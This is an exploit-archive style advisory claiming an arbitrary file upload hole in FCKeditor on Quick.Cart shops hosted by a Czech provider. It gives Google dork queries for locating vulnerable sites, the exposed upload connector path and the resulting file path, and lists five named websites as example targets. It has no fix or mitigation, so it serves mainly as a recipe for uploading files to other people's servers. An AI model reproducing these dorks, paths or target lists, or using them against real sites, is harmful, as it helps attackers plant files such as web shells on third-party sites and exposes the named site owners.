#################################################################################################
# Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 25/06/2018
# Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
#################################################################################################
# Google Dorks :
intext:''Copyright © 2008 www.univex.cz''
intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz
# Exploit : .../fckeditor/editor/filemanager/connectors/uploadtest.html
# Path : /files/....
#################################################################################################
# Example Sites :
designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################